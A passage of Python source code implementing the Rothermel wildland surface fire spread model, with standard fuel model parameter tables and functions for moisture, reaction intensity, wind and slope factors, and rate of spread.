self.live = self.calculateIntermediates(fuelModel,savrLive,loadLive,liveFraction,heatLive,moistureLive)
def calculateIntermediates(self,fuelModel,savr,load,fraction,heat,moisture):
totalSilicaContent = 0.0555 # Rothermel 1972
silicaEffective = np.zeros((len(savr),))+0.01 # From behavePlus source, should be 0 if no fuel
wn = np.zeros((len(savr),))
weightedHeat = 0.0
weightedSilica = 0.0
weightedMoisture = 0.0
weightedSavr = 0.0
totalLoadForLifeState = 0.0
"""
for i in range(0,len(moisture)):
wn[i] = load[i]*(1.0-totalSilicaContent)
weightedHeat = weightedHeat + fraction[i] * heat[i]
weightedSilica = weightedSilica + fraction[i] * silicaEffective
weightedMoisture = weightedMoisture + fraction[i]*moisture[i]
weightedSavr = weightedSavr + fraction[i] * savr[i]
totalLoadForLifeState = totalLoadForLifeState + load[i]
"""
#print(fraction,moisture)
wn = [x*(1.0-totalSilicaContent) for x in load] #wn[i] = load[i]*(1.0-totalSilicaContent)
weightedHeat = np.dot(fraction,heat) #weightedHeat = weightedHeat + fraction[i] * heat[i]
weightedSilica = np.dot(fraction,silicaEffective) #weightedSilica = weightedSilica + fraction[i] * silicaEffective
weightedMoisture = np.dot(fraction,moisture) #weightedMoisture = weightedMoisture + fraction[i]*moisture[i]
weightedSavr = np.dot(fraction,savr) #weightedSavr = weightedSavr + fraction[i] * savr[i]
totalLoadForLifeState = np.sum(load) #totalLoadForLifeState = totalLoadForLifeState + load[i]
if fuelModel.isDynamic and False:
weightedFuelLoad = np.sum(wn) # This gives better agreement with
# behavePlus for dynamic fuel models;
# however, the source code for
# BehavePlus shows this should be
# weightedFuelLoad=np.dot(fraction,wn)
else:
weightedFuelLoad = np.dot(wn,fraction)
return [weightedHeat,weightedSilica,weightedMoisture,weightedSavr,totalLoadForLifeState,weightedFuelLoad]
def buildFuelModels(allowDynamicModels=True,allowNonBurningModels=False):
"""
fuelModelNumber, code, name
fuelBedDepth, moistureOfExtinctionDeadFuel, heatOfCombustionDeadFuel, heatOfCombustionLiveFuel,
fuelLoad1Hour, fuelLoad10Hour, fuelLoad100Hour, fuelLoadLiveHerb, fuelLoadLiveWood,
savr1HourFuel, savrLiveHerb, savrLiveWood,
isDynamic, isReserved
- WMC 10/2015
"""
fuelModels = dict()
# Code FMx: Original 13 Fuel Models
fuelModels["FM1"] = FuelModel(
1, "FM1", "Short grass [1]",
1.0, 0.12, 8000, 8000,
0.034, 0, 0, 0, 0,
3500, 1500, 1500,
False, True)
fuelModels["FM2"] = FuelModel(
2, "FM2", "Timber grass and understory [2]",
1.0, 0.15, 8000, 8000,
0.092, 0.046, 0.023, 0.023,
0,3000, 1500, 1500,
False, True)
fuelModels["FM3"] = FuelModel(
3, "FM3", "Tall grass [3]",
2.5, 0.25, 8000, 8000,
0.138, 0, 0, 0, 0,
1500, 1500, 1500,
False, True)
fuelModels["FM4"] = FuelModel(
4, "FM4", "Chaparral [4]",
6.0, 0.2, 8000, 8000,
0.230, 0.184, 0.092, 0, 0.230,
2000, 1500, 1500,
False, True)
fuelModels["FM5"] = FuelModel(
5, "FM5", "Brush [5]",
2.0, 0.20, 8000, 8000,
0.046, 0.023, 0, 0, 0.092,
2000, 1500, 1500,
False, True)
fuelModels["FM6"] = FuelModel(
6, "FM6", "Dormant brush, hardwood slash [6]",
2.5, 0.25, 8000, 8000,
0.069, 0.115, 0.092, 0, 0,
1750, 1500, 1500,
False, True)
fuelModels["FM7"] = FuelModel(
7, "FM7", "Southern rough [7]",
2.5, 0.40, 8000, 8000,
0.052, 0.086, 0.069, 0, 0.017,
1750, 1500, 1500,
False, True)
fuelModels["FM8"] = FuelModel(
8, "FM8", "Short needle litter [8]",
0.2, 0.3, 8000, 8000,
0.069, 0.046, 0.115, 0, 0,
2000, 1500, 1500,
False, True)
fuelModels["FM9"] = FuelModel(
9, "FM9", "Long needle or hardwood litter [9]",
0.2, 0.25, 8000, 8000,
0.134, 0.019, 0.007, 0, 0,
2500, 1500, 1500,
False, True)
fuelModels["FM10"] = FuelModel(
10, "FM10", "Timber litter & understory [10]",
1.0, 0.25, 8000, 8000,
0.138, 0.092, 0.230, 0, 0.092,
2000, 1500, 1500,
False, True)
fuelModels["FM11"] = FuelModel(
11, "FM11", "Light logging slash [11]",
1.0, 0.15, 8000, 8000,
0.069, 0.207, 0.253, 0, 0,
1500, 1500, 1500,
False, True)
fuelModels["FM12"] = FuelModel(
12, "FM12", "Medium logging slash [12]",
2.3, 0.20, 8000, 8000,
0.184, 0.644, 0.759, 0, 0,
1500, 1500, 1500,
False, True)
fuelModels["FM13"] = FuelModel(
13, "FM13", "Heavy logging slash [13]",
3.0, 0.25, 8000, 8000,
0.322, 1.058, 1.288, 0, 0,
1500, 1500, 1500,
False, True)
if not allowDynamicModels:
return fuelModels
else:
pass
# 14-89 Available for custom models
if allowNonBurningModels:
# Code NBx: Non-burnable
# 90 Available for custom NB model
fuelModels["NB1"] = FuelModel(
91, "NB1", "Urban, developed [91]",
1.0, 0.10, 8000, 8000,
0, 0, 0, 0, 0,
1500, 1500, 1500,
False, True)
fuelModels["NB2"] = FuelModel(
92, "NB2", "Snow, ice [92]",
1.0, 0.10, 8000, 8000,
0, 0, 0, 0, 0,
1500, 1500, 1500,
False, True)
fuelModels["NB3"] = FuelModel(
93, "NB3", "Agricultural [93]",
1.0, 0.10, 8000, 8000,
0, 0, 0, 0, 0,
1500, 1500, 1500,
False, True)
# Indices 94-95 Reserved for future standard non-burnable models
fuelModels["NB4"] = FuelModel(
94, "NB4", "Future standard non-burnable [94]",
1.0, 0.10, 8000, 8000,
0, 0, 0, 0, 0,
1500, 1500, 1500,
False, True)
fuelModels["NB5"] = FuelModel(
95, "NB5", "Future standard non-burnable [95]",
1.0, 0.10, 8000, 8000,
0, 0, 0, 0, 0,
1500, 1500, 1500,
False, True)
# Indices 96-97 Available for custom NB model
fuelModels["NB8"] = FuelModel(
98, "NB8", "Open water [98]",
1.0, 0.10, 8000, 8000,
0, 0, 0, 0, 0,
1500, 1500, 1500,
False, True)
fuelModels["NB9"] = FuelModel(
99, "NB9", "Bare ground [99]",
1.0, 0.10, 8000, 8000,
0, 0, 0, 0, 0,
1500, 1500, 1500,
False, True)
# Code GRx: Grass
# Index 100 Available for custom GR model
f = 2000.0 / 43560.0
fuelModels["GR1"] = FuelModel(
101, "GR1", "Short, sparse, dry climate grass (D)",
0.4, 0.15, 8000, 8000,
0.10*f, 0, 0, 0.30*f, 0,
2200, 2000, 1500,
True, True)
fuelModels["GR2"] = FuelModel(
102, "GR2", "Low load, dry climate grass (D)",
1.0, 0.15, 8000, 8000,
0.10*f, 0, 0, 1.0*f, 0,
2000, 1800, 1500,
True, True)
fuelModels["GR3"] = FuelModel(
103, "GR3", "Low load, very coarse, humid climate grass (D)",
2.0, 0.30, 8000, 8000,
0.10*f, 0.40*f, 0, 1.50*f, 0,
1500, 1300, 1500,
True, True)
fuelModels["GR4"] = FuelModel(
104, "GR4", "Moderate load, dry climate grass (D)",
2.0, 0.15, 8000, 8000,
0.25*f, 0, 0, 1.9*f, 0,
2000, 1800, 1500,
True, True)
fuelModels["GR5"] = FuelModel(
105, "GR5", "Low load, humid climate grass (D)",
1.5, 0.40, 8000, 8000,
0.40*f, 0.0, 0.0, 2.50*f, 0.0,
1800, 1600, 1500,
True, True)
fuelModels["GR6"] = FuelModel(
106, "GR6", "Moderate load, humid climate grass (D)",
1.5, 0.40, 9000, 9000,
0.10*f, 0, 0, 3.4*f, 0,
2200, 2000, 1500,
True, True)
fuelModels["GR7"] = FuelModel(
107, "GR7", "High load, dry climate grass (D)",
3.0, 0.15, 8000, 8000,
1.0*f, 0, 0, 5.4*f, 0,
2000, 1800, 1500,
True, True)
fuelModels["GR8"] = FuelModel(
108, "GR8", "High load, very coarse, humid climate grass (D)",
4.0, 0.30, 8000, 8000,
0.5*f, 1.0*f, 0, 7.3*f, 0,
1500, 1300, 1500,
True, True)
fuelModels["GR9"] = FuelModel(
109, "GR9", "Very high load, humid climate grass (D)",
5.0, 0.40, 8000, 8000,
1.0*f, 1.0*f, 0, 9.0*f, 0,
1800, 1600, 1500,
True, True)
# 110-112 are reserved for future standard grass models
# 113-119 are available for custom grass models
# Code GSx: Grass and shrub
# 120 available for custom grass and shrub model
fuelModels["GS1"] = FuelModel(
121, "GS1", "Low load, dry climate grass-shrub (D)",
0.9, 0.15, 8000, 8000,
0.2*f, 0, 0, 0.5*f, 0.65*f,
2000, 1800, 1800,
True, True)
fuelModels["GS2"] = FuelModel(
122, "GS2", "Moderate load, dry climate grass-shrub (D)",
1.5, 0.15, 8000, 8000,
0.5*f, 0.5*f, 0, 0.6*f, 1.0*f,
2000, 1800, 1800,
True, True)
fuelModels["GS3"] = FuelModel(
123, "GS3", "Moderate load, humid climate grass-shrub (D)",
1.8, 0.40, 8000, 8000,
0.3*f, 0.25*f, 0, 1.45*f, 1.25*f,
1800, 1600, 1600,
True, True)
fuelModels["GS4"] = FuelModel(
124, "GS4", "High load, humid climate grass-shrub (D)",
2.1, 0.40, 8000, 8000,
1.9*f, 0.3*f, 0.1*f, 3.4*f, 7.1*f,
1800, 1600, 1600,
True, True)
# 125-130 reserved for future standard grass and shrub models
# 131-139 available for custom grass and shrub models
# Shrub
# 140 available for custom shrub model
fuelModels["SH1"] = FuelModel(
141, "SH1", "Low load, dry climate shrub (D)",
1.0, 0.15, 8000, 8000,
0.25*f, 0.25*f, 0, 0.15*f, 1.3*f,
2000, 1800, 1600,
True, True)
fuelModels["SH2"] = FuelModel(
142, "SH2", "Moderate load, dry climate shrub (S)",
1.0, 0.15, 8000, 8000,
1.35*f, 2.4*f, 0.75*f, 0, 3.85*f,
2000, 1800, 1600,
True, True)
fuelModels["SH3"] = FuelModel(
143, "SH3", "Moderate load, humid climate shrub (S)",
2.4, 0.40, 8000., 8000.,
0.45*f, 3.0*f, 0, 0, 6.2*f,
1600, 1800, 1400,
True, True)
fuelModels["SH4"] = FuelModel(
144, "SH4", "Low load, humid climate timber-shrub (S)",
3.0, 0.30, 8000, 8000,
0.85*f, 1.15*f, 0.2*f, 0, 2.55*f,
2000, 1800, 1600,
True, True)
fuelModels["SH5"] = FuelModel(
145, "SH5", "High load, dry climate shrub (S)",
6.0, 0.15, 8000, 8000,
3.6*f, 2.1*f, 0, 0, 2.9*f,
750, 1800, 1600,
True, True)
fuelModels["SH6"] = FuelModel(
146, "SH6", "Low load, humid climate shrub (S)",
2.0, 0.30, 8000, 8000,
2.9*f, 1.45*f, 0, 0, 1.4*f,
750, 1800, 1600,
True, True)
fuelModels["SH7"] = FuelModel(
147, "SH7", "Very high load, dry climate shrub (S)",
6.0, 0.15, 8000, 8000,
3.5*f, 5.3*f, 2.2*f, 0, 3.4*f,
750, 1800, 1600,
True, True)
fuelModels["SH8"] = FuelModel(
148, "SH8", "High load, humid climate shrub (S)",
3.0, 0.40, 8000, 8000,
2.05*f, 3.4*f, 0.85*f, 0, 4.35*f,
750, 1800, 1600,
True, True)
fuelModels["SH9"] = FuelModel(
149, "SH9", "Very high load, humid climate shrub (D)",
4.4, 0.40, 8000, 8000,
4.5*f, 2.45*f, 0, 1.55*f, 7.0*f,
750, 1800, 1500,
True, True)
# 150-152 reserved for future standard shrub models
# 153-159 available for custom shrub models
# Timber and understory
# 160 available for custom timber and understory model
fuelModels["TU1"] = FuelModel(
161, "TU1", "Light load, dry climate timber-grass-shrub (D)",
0.6, 0.20, 8000, 8000,
0.2*f, 0.9*f, 1.5*f, 0.2*f, 0.9*f,
2000, 1800, 1600,
True, True)
fuelModels["TU2"] = FuelModel(
162, "TU2", "Moderate load, humid climate timber-shrub (S)",
1.0, 0.30, 8000, 8000,
0.95*f, 1.8*f, 1.25*f, 0, 0.2*f,
2000, 1800, 1600,
True, True)
fuelModels["TU3"] = FuelModel(
163, "TU3", "Moderate load, humid climate timber-grass-shrub (D)",
1.3, 0.30, 8000, 8000,
1.1*f, 0.15*f, 0.25*f, 0.65*f, 1.1*f,
1800, 1600, 1400,
True, True)
fuelModels["TU4"] = FuelModel(
164, "TU4", "Dwarf conifer understory (S)",
0.5, 0.12, 8000, 8000,
4.5*f, 0, 0, 0, 2.0*f,
2300, 1800, 2000,
True, True)
fuelModels["TU5"] = FuelModel(
165, "TU5", "Very high load, dry climate timber-shrub (S)",
1.0, 0.25, 8000, 8000,
4.0*f, 4.0*f, 3.0*f, 0, 3.0*f,
1500, 1800, 750,
True, True)
# 166-170 reserved for future standard timber and understory models
# 171-179 available for custom timber and understory models
# Timber and litter
# 180 available for custom timber and litter models
fuelModels["TL1"] = FuelModel(
181, "TL1", "Low load, compact conifer litter (S)",
0.2, 0.30, 8000, 8000,
1.0*f, 2.2*f, 3.6*f, 0, 0,
2000, 1800, 1600,
True, True)
fuelModels["TL2"] = FuelModel(
182, "TL2", "Low load broadleaf litter (S)",
0.2, 0.25, 8000, 8000,
1.4*f, 2.3*f, 2.2*f, 0, 0,
2000, 1800, 1600,
True, True)
fuelModels["TL3"] = FuelModel(
183, "TL3", "Moderate load conifer litter (S)",
0.3, 0.20, 8000, 8000,
0.5*f, 2.2*f, 2.8*f, 0, 0,
2000, 1800, 1600,
True, True)
fuelModels["TL4"] = FuelModel(
184, "TL4", "Small downed logs (S)",
0.4, 0.25, 8000, 8000,
0.5*f, 1.5*f, 4.2*f, 0, 0,
2000, 1800, 1600,
True, True)
fuelModels["TL5"] = FuelModel(
185, "TL5", "High load conifer litter (S)",
0.6, 0.25, 8000, 8000,
1.15*f, 2.5*f, 4.4*f, 0, 0,
2000, 1800, 160,
True, True)
fuelModels["TL6"] = FuelModel(
186, "TL6", "High load broadleaf litter (S)",
0.3, 0.25, 8000, 8000,
2.4*f, 1.2*f, 1.2*f, 0, 0,
2000, 1800, 1600,
True, True)
fuelModels["TL7"] = FuelModel(
187, "TL7", "Large downed logs (S)",
0.4, 0.25, 8000, 8000,
0.3*f, 1.4*f, 8.1*f, 0, 0,
2000, 1800, 1600,
True, True)
fuelModels["TL8"] = FuelModel(
188, "TL8", "Long-needle litter (S)",
0.3, 0.35, 8000, 8000,
5.8*f, 1.4*f, 1.1*f, 0, 0,
1800, 1800, 1600,
True, True)
fuelModels["TL9"] = FuelModel(
189, "TL9", "Very high load broadleaf litter (S)",
0.6, 0.35, 8000, 8000,
6.65*f, 3.30*f, 4.15*f, 0, 0,
1800, 1800, 1600,
True, True)
# 190-192 reserved for future standard timber and litter models
# 193-199 available for custom timber and litter models
# Slash and blowdown
# 200 available for custom slash and blowdown model
fuelModels["SB1"] = FuelModel(
201, "SB1", "Low load activity fuel (S)",
1.0, 0.25, 8000, 8000,
1.5*f, 3.0*f, 11.0*f, 0, 0,
2000, 1800, 1600,
True, True)
fuelModels["SB2"] = FuelModel(
202, "SB2", "Moderate load activity or low load blowdown (S)",
1.0, 0.25, 8000, 8000,
4.5*f, 4.25*f, 4.0*f, 0, 0,
2000, 1800, 1600,
True, True)
fuelModels["SB3"] = FuelModel(
203, "SB3", "High load activity fuel or moderate load blowdown (S)",
1.2, 0.25, 8000, 8000,
5.5*f, 2.75*f, 3.0*f, 0, 0,
2000, 1800, 1600,
True, True)
fuelModels["SB4"] = FuelModel(
204, "SB4", "High load blowdown (S)",
2.7, 0.25, 8000, 8000,
5.25*f, 3.5*f, 5.25*f, 0, 0,
2000, 1800, 1600,
True, True)
return fuelModels
def buildFuelModelsIdx():
fuelModels = np.empty((256,),dtype=object)
fuelModels[1] = 'FM1'
fuelModels[2] = 'FM2'
fuelModels[3] = 'FM3'
fuelModels[4] = 'FM4'
fuelModels[5] = 'FM5'
fuelModels[6] = 'FM6'
fuelModels[7] = 'FM7'
fuelModels[8] = 'FM8'
fuelModels[9] = 'FM9'
fuelModels[10] = 'FM10'
fuelModels[11] = 'FM11'
fuelModels[12] = 'FM12'
fuelModels[13] = 'FM13'
# 14-89 Available for custom models
fuelModels[91] = 'NB1'
fuelModels[92] = 'NB2'
fuelModels[93] = 'NB3'
# Indices 94-95 Reserved for future standard non-burnable models
# Indices 96-97 Available for custom NB model
fuelModels[98] = 'NB8'
fuelModels[99] = 'NB9'
# Index 100 Available for custom GR model
fuelModels[101] = 'GR1'
fuelModels[102] = 'GR2'
fuelModels[103] = 'GR3'
fuelModels[104] = 'GR4'
fuelModels[105] = 'GR5'
fuelModels[106] = 'GR6'
fuelModels[107] = 'GR7'
fuelModels[108] = 'GR8'
fuelModels[109] = 'GR9'
# 110-112 are reserved for future standard grass models
# 113-119 are available for custom grass models
# 120 available for custom grass and shrub model
fuelModels[121] = 'GS1'
fuelModels[122] = 'GS2'
fuelModels[123] = 'GS3'
fuelModels[124] = 'GS4'
# 125-130 reserved for future standard grass and shrub models
# 131-139 available for custom grass and shrub models
# 140 available for custom shrub model
fuelModels[141] = 'SH1'
fuelModels[142] = 'SH2'
fuelModels[143] = 'SH3'
fuelModels[144] = 'SH4'
fuelModels[145] = 'SH5'
fuelModels[146] = 'SH6'
fuelModels[147] = 'SH7'
fuelModels[148] = 'SH8'
fuelModels[149] = 'SH9'
# 150-152 reserved for future standard shrub models
# 153-159 available for custom shrub models
# 160 available for custom timber and understory model
fuelModels[161] = 'TU1'
fuelModels[162] = 'TU2'
fuelModels[163] = 'TU3'
fuelModels[164] = 'TU4'
fuelModels[165] = 'TU5'
# 166-170 reserved for future standard timber and understory models
# 171-179 available for custom timber and understory models
# 180 available for custom timber and litter models
fuelModels[181] = 'TL1'
fuelModels[182] = 'TL2'
fuelModels[183] = 'TL3'
fuelModels[184] = 'TL4'
fuelModels[185] = 'TL5'
fuelModels[186] = 'TL6'
fuelModels[187] = 'TL7'
fuelModels[188] = 'TL8'
fuelModels[189] = 'TL9'
# 190-192 reserved for future standard timber and litter models
# 193-199 available for custom timber and litter models
# 200 available for custom slash and blowdown model
fuelModels[201] = 'SB1'
fuelModels[202] = 'SB2'
fuelModels[203] = 'SB3'
fuelModels[204] = 'SB4'
return fuelModels
def getFuelModel(fuelModel):
fuelModels = buildFuelModels(allowDynamicModels=True,allowNonBurningModels=True)
return fuelModels[fuelModel]
def getMoistureContent(m1h,m10h,m100h,lhm,lwm):
moistureDead = [m1h,m10h,m100h,m1h]
moistureLive = [lhm,lwm]
moistureDead = [x/100 for x in moistureDead]
moistureLive = [x/100 for x in moistureLive]
return moistureDead, moistureLive
def getSAV(fuelModel):
# In behavePlus, there is a conversion to surfaceAreaToVolumeUnits
savrDead = [fuelModel.savr1HourFuel, 109.0, 30.0, fuelModel.savrLiveHerb]
savrLive = [fuelModel.savrLiveHerb, fuelModel.savrLiveWood, 0.0, 0.0]
return savrDead, savrLive
def getFuelLoad(fuelModel,moistureLive):
loadDead = [fuelModel.fuelLoad1Hour,
fuelModel.fuelLoad10Hour,
fuelModel.fuelLoad100Hour,
0.0]
loadLive = [fuelModel.fuelLoadLiveHerb,
fuelModel.fuelLoadLiveWood,
0.0,
0.0]
#print(loadDead)
#print(loadLive)
if fuelModel.isDynamic:
if moistureLive[0] < 0.30:
loadDead[3] = loadLive[0]
loadLive[0] = 0.0
elif moistureLive[0] <= 1.20:
#print(loadLive[0] * (1.333 - 1.11 * moistureLive[0]))
loadDead[3] = loadLive[0] * (1.333 - 1.11 * moistureLive[0])
#loadDead[3] = loadLive[0] * (1.20 - moistureLive[0])/0.9
loadLive[0] = loadLive[0] - loadDead[3]
#print(loadLive)
#print(loadDead)
#print(loadDead)
#print(loadLive)
return loadDead, loadLive
def getHeatOfCombustion(fuelModel):
heatOfCombustionDead = fuelModel.heatOfCombustionDeadFuel
heatOfCombustionLive = fuelModel.heatOfCombustionLiveFuel
return heatOfCombustionDead, heatOfCombustionLive
def getDLFraction(fuelModel,moistureLive):
fuelDensity = 32.0 # Rothermel 1972
savrDead, savrLive = getSAV(fuelModel)
loadDead, loadLive = getFuelLoad(fuelModel,moistureLive)
#print(loadDead)
#print(savrDead)
surfaceAreaDead = [x*y/fuelDensity for x,y in zip(loadDead,savrDead)]
surfaceAreaLive = [x*y/fuelDensity for x,y in zip(loadLive,savrLive)]
#print(surfaceAreaDead)
totalSurfaceAreaDead = np.sum(surfaceAreaDead)
totalSurfaceAreaLive = np.sum(surfaceAreaLive)
fractionOfTotalSurfaceAreaDead = totalSurfaceAreaDead/(totalSurfaceAreaDead+totalSurfaceAreaLive)
fractionOfTotalSurfaceAreaLive = 1.0 - fractionOfTotalSurfaceAreaDead
if totalSurfaceAreaDead > 1.0e-7:
deadFraction = [x/totalSurfaceAreaDead for x in surfaceAreaDead]
else:
deadFraction= [0 for x in surfaceAreaDead]
if totalSurfaceAreaLive > 1.0e-7:
liveFraction = [x/totalSurfaceAreaLive for x in surfaceAreaLive]
else:
liveFraction= [0 for x in surfaceAreaLive]
return deadFraction, liveFraction, fractionOfTotalSurfaceAreaDead, fractionOfTotalSurfaceAreaLive
def getMoistOfExt(fuelModel,moistureDead,moistureLive):
loadDead, loadLive = getFuelLoad(fuelModel,moistureLive)
savrDead, savrLive = getSAV(fuelModel)
moistOfExtDead = fuelModel.moistureOfExtinctionDeadFuel
fineDead = 0.0
fineLive = 0.0
fineFuelsWeightingFactor = 0.0
weightedMoistureFineDead = 0.0
fineDeadMoisture = 0.0
fineDeadOverFineLive = 0.0
for i in range(0,len(loadDead)):
if savrDead[i] > 1.0e-7:
fineFuelsWeightingFactor = loadDead[i] * np.exp(-138.0/savrDead[i])
fineDead = fineDead + fineFuelsWeightingFactor
weightedMoistureFineDead = weightedMoistureFineDead + fineFuelsWeightingFactor * moistureDead[i]
if fineDead > 1.0e-7:
fineDeadMoisture = weightedMoistureFineDead / fineDead
for i in range(0,len(loadLive)):
if savrLive[i] > 1.0e-7:
fineLive = fineLive + loadLive[i]*np.exp(-500.0/savrLive[i])
if fineLive > 1.0e-7:
fineDeadOverFineLive = fineDead / fineLive
moistOfExtLive = (2.9 * fineDeadOverFineLive * (1.0 - (fineDeadMoisture) / moistOfExtDead)) - 0.226
#print("MoEL:",moistOfExtLive)
if moistOfExtLive < moistOfExtDead:
moistOfExtLive = moistOfExtDead
return moistOfExtDead, moistOfExtLive
def getCharacteristicSAVR(fuelModel,intermediates,moistureLive):
deadFraction, liveFraction, deadFractionTotal, liveFractionTotal = getDLFraction(fuelModel,moistureLive)
weightedSavrLive = intermediates.live[3]
weightedSavrDead = intermediates.dead[3]
sigma = deadFractionTotal * weightedSavrDead + liveFractionTotal * weightedSavrLive
return sigma
def getPackingRatios(fuelModel,intermediates,moistureLive):
fuelDensity = 32.0 # Rothermel 1972
sigma = getCharacteristicSAVR(fuelModel,intermediates,moistureLive)
totalLoadForLifeStateLive = intermediates.live[4]
totalLoadForLifeStateDead = intermediates.dead[4]
totalLoad = totalLoadForLifeStateLive + totalLoadForLifeStateDead
depth = fuelModel.fuelBedDepth
bulkDensity = totalLoad / depth
packingRatio = totalLoad / (depth * fuelDensity)
sigma = round(sigma,0)
optimumPackingRatio = 3.348 / (sigma**0.8189)
#packingRatio = round(packingRatio,4)
relativePackingRatio = packingRatio / optimumPackingRatio
return packingRatio, relativePackingRatio, bulkDensity
def getWeightedFuelLoads(fuelModel,intermediates):
weightedFuelLoadDead = intermediates.dead[5]
weightedFuelLoadLive = intermediates.live[5]
return weightedFuelLoadDead, weightedFuelLoadLive
def getWeightedHeats(fuelModel,intermediates):
weightedHeatDead = intermediates.dead[0]
weightedHeatLive = intermediates.live[0]
return weightedHeatDead, weightedHeatLive
def getWeightedSilicas(fuelModel,intermediates):
weightedSilicaDead = intermediates.dead[1]
weightedSilicaLive = intermediates.live[1]
return weightedSilicaDead, weightedSilicaLive
def getHeatSink(fuelModel,moistureDead,moistureLive,bulkDensity):
savrDead, savrLive = getSAV(fuelModel)
qigDead = np.zeros((len(savrDead),))
qigLive = np.zeros((len(savrLive),))
deadFraction, liveFraction, deadFractionTotal, liveFractionTotal = getDLFraction(fuelModel,moistureLive)
heatSink = 0
for i in range(0,len(savrDead)):
if savrDead[i] > 1.0e-7:
qigDead[i] = 250 + 1116.0 * (moistureDead[i])
heatSink = heatSink + deadFractionTotal*deadFraction[i]*qigDead[i]*np.exp(-138.0/savrDead[i])
if savrLive[i] > 1.0e-7:
qigLive[i] = 250 + 1116.0 * (moistureLive[i])
heatSink = heatSink + liveFractionTotal*liveFraction[i]*qigLive[i]*np.exp(-138.0/savrLive[i])
heatSink = heatSink * bulkDensity
return heatSink
def getHeatFlux(fuelModel,moistureDead,moistureLive,sigma,packingRatio):
if sigma < 1.0e-7:
heatFlux = 0.0
else:
heatFlux = np.exp((0.792 + 0.681 * sigma**0.5)*(packingRatio + 0.1)) / (192 + 0.2595 * sigma)
return heatFlux
def getWeightedMoistures(fuelModel,intermediates):
weightedMoistureDead = intermediates.dead[2]
weightedMoistureLive = intermediates.live[2]
return weightedMoistureDead, weightedMoistureLive
def getEtaM(fuelModel,intermediates,MoED,MoEL):
weightedMoistureDead, weightedMoistureLive = getWeightedMoistures(fuelModel,intermediates)
def calculateEtaM(weightedMoisture,MoE):
relativeMoisture = 0.0
if MoE > 0.0:
relativeMoisture = weightedMoisture / MoE
if weightedMoisture > MoE or relativeMoisture > 1.0:
etaM = 0
else:
etaM = 1.0 - (2.59 * relativeMoisture) + (5.11 * (relativeMoisture**2))-(3.52*(relativeMoisture**3))
return etaM
etaMDead = calculateEtaM(weightedMoistureDead,MoED)
etaMLive = calculateEtaM(weightedMoistureLive,MoEL)
return etaMDead, etaMLive
def getEtaS(fuelModel,intermediates):
weightedSilicaDead, weightedSilicaLive = getWeightedSilicas(fuelModel,intermediates)
def calculateEtaS(weightedSilica):
etaSDen = weightedSilica ** 0.19
if etaSDen < 1e-6:
etaS = 0.0
else:
etaS = 0.174 / etaSDen
return min([etaS,1.0])
etaSDead = calculateEtaS(weightedSilicaDead)
etaSLive = calculateEtaS(weightedSilicaLive)
return etaSDead, etaSLive
def getSurfaceFireReactionIntensity(fuelModel,sigma,relativePackingRatio,MoED,MoEL,intermediates):
aa = 133.0 / (sigma ** 0.7913) # Albini 1976
gammaMax = (sigma ** 1.5) / (495.0+(0.0594*(sigma**1.5)))
gamma = gammaMax * (relativePackingRatio**aa) * np.exp(aa * (1.0-relativePackingRatio))
weightedFuelLoadDead, weightedFuelLoadLive = getWeightedFuelLoads(fuelModel,intermediates)
weightedHeatDead, weightedHeatLive = getWeightedHeats(fuelModel,intermediates)
#MoEL = 1.99
etaMDead, etaMLive = getEtaM(fuelModel,intermediates,MoED,MoEL)
etaSDead, etaSLive = getEtaS(fuelModel,intermediates)
#print("gamma:",gamma)
#print("weightedFuelLoadDead/Live:",weightedFuelLoadDead,weightedFuelLoadLive)
#print("weightedHeatDead/Live:",weightedHeatDead,weightedHeatLive)
#print("etaMDead/Live",etaMDead,etaMLive)
#print("etaSDead/Live",etaSDead,etaSLive)
"""
print("gamma",gamma)
print("weightedFuelLoadDead",weightedFuelLoadDead)
print("weightedHeatDead",weightedHeatDead,weightedHeatLive)
print("etaMDead",etaMDead,etaMLive)
print("etaSDead",etaSDead,etaSLive)
"""
reactionIntensityDead = gamma * weightedFuelLoadDead * weightedHeatDead * etaMDead * etaSDead
reactionIntensityLive = gamma * weightedFuelLoadLive * weightedHeatLive * etaMLive * etaSLive
#reactionIntensityDead = 7505
reactionIntensity = reactionIntensityDead+reactionIntensityLive
#print("Dead Fuel Reaction Intensity: %.0f"%(reactionIntensityDead))
#print("Live Fuel Reaction Intensity: %.0f"%(reactionIntensityLive))
#print("Reaction Intensity: %.0f"%(reactionIntensity))
return reactionIntensity, reactionIntensityDead, reactionIntensityLive
def getNoWindNoSlopeSpreadRate(reactionIntensity,heatFlux,heatSink):
if heatSink < 1.0e-7:
Rstar = 0.0
else:
Rstar = reactionIntensity*heatFlux/heatSink
#print("HeatSource:",reactionIntensity*heatFlux)
#print("NoWindNoSlopeSpredRate:",Rstar)
return Rstar
def convertFtMinToChHr(R):
R = R/1.100
return R
def calculateMidflameWindSpeed(fuelModel,windSpeed,canopyCover,canopyHeight,crownRatio,
windHeightInputMode='TwentyFoot'):
if windHeightInputMode == 'TenMeter':
windSpeed = windSpeed/ 1.15
depth = fuelModel.fuelBedDepth
canopyCrownFraction = crownRatio * canopyCover / 3.0
if canopyCover < 1.0e-7 or canopyCrownFraction < 0.05 or canopyHeight < 6.0:
sheltered = False
else:
sheltered = True
if sheltered:
waf = 0.555 / (((canopyCrownFraction * canopyHeight)**0.5)*np.log((20.0+0.36*canopyHeight) / (0.13 * canopyHeight)))
elif depth > 1.0e-7:
waf = 1.83 / np.log((20.0+0.36 * depth) / (0.13 * depth))
else:
waf = 1.0
midflameWindSpeed = waf * windSpeed
return midflameWindSpeed, waf
def calculateWindFactor(sigma,relativePackingRatio,mfWindSpeed):
windC, windB, windE = getWindIntermediates(sigma)
mfWindSpeed = mfWindSpeed*88 # Convert mph to ft/min
if mfWindSpeed < 1.0e-7:
phiW = 0.0
else:
phiW = (mfWindSpeed**windB) * windC * (relativePackingRatio**(-windE))
return phiW
def getWindIntermediates(sigma):
windC = 7.47 * np.exp(-0.133 * (sigma**0.55))
windB = 0.02526 * (sigma ** 0.54)
windE = 0.715 * np.exp(-0.000359*sigma)
return windC, windB, windE
def calculateSlopeFactor(slope,packingRatio,isAngle=False,isDegree=True):
if isAngle:
if isDegree:
slope = slope/180.0*3.1415926535
slopex = np.tan(slope)
else:
slopex = slope
phiS = 5.275 * (packingRatio**(-0.3)) * (slopex**2)
return phiS
def calculateROS(Rstar,phiW,phiS):
R = Rstar * (1+phiW+phiS)
return R
def calculateDirectionOfMaxSpread(windDir,aspect,Rstar,phiS,phiW):
correctedWindDir = windDir-aspect
windDirRadians = correctedWindDir * 3.1415926535 / 180.0
slopeRate = Rstar*phiS
windRate = Rstar*phiW
x = slopeRate + (windRate * np.cos(windDirRadians))
